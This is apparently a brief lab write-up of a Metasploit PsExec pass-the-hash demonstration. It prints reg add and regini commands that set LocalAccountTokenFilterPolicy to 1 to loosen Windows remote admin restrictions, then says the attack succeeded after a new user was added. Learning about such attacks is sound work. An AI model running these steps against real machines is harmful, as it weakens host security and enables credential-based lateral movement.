Metasploit PsExec pass the hash attack demonstration:
1.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
2.Add a new DWORD (32-bit) key named ‘ LocalAccountTokenFilterPolicy’ and set the value to 1
regini HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System LocalAccountTokenFilterPolicy = REG_DWORD 1
C:\Windows\system32>reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
The operation completed successfully.
I firstly used existing shell to windows command prompt shell:
After I added the registry value above.After i changed registry value.I added different user named “bedri”.Succesfully made the pass the hash attack as images below:
Thanks the Joseph McCray
References:
http://www.rebootuser.com/?p=1268#.VesQeTYVjIU
https://www.offensive-security.com/metasploit-unleashed/interacting-registry/
http://www.strategicsec.com